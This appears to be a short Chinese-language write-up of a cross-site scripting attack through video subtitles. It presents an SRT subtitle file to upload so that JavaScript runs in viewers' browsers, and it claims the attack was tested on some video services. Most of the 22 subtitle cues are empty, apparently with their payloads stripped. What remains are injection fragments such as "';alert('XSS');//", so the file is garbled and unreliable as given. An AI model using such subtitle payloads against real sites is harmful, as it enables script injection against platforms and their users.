攻击者可能在视频的副标题中执行JavaScript。这也被称为XSS(Cross-Site Scripting)。如果网站在浏览器中单独加载字幕,攻击者可以在视频字幕中运行任何html或javascript。它已经在一些视频服务上进行了测试。
攻击者可以通过srt的格式保存下面提到的内容,并将准备好的srt文件上传为视频的字幕
1
00:00:37,618 --> 00:00:42,557
: '';!--'
2
00:00:58,425 --> 00:01:00,704
3
00:01:00,705 --> 00:01:01,873
4
00:01:02,225 --> 00:01:04,519
5
00:01:04,520 --> 00:01:05,547
6
00:01:05,864 --> 00:01:08,117
7
00:01:08,224 --> 00:01:09,223
'>
8
00:01:09,224 --> 00:01:10,434
9
00:01:11,384 --> 00:01:12,427
10
00:01:15,504 --> 00:01:17,506
11
00:01:19,743 --> 00:01:20,786
12
00:01:24,183 --> 00:01:25,351
13
00:01:40,663 --> 00:01:41,705
14
00:01:42,703 --> 00:01:45,742
15
00:01:45,743 --> 00:01:46,285
16
00:01:48,503 --> 00:01:49,545
17
00:01:49,582 --> 00:01:51,709
18
00:01:54,822 --> 00:01:58,200
19
00:02:01,021 --> 00:02:03,691
20
00:02:04,702 --> 00:02:05,744
21
00:02:15,700 --> 00:02:18,536
22
00:02:18,740 --> 00:02:22,619
';alert('XSS');//
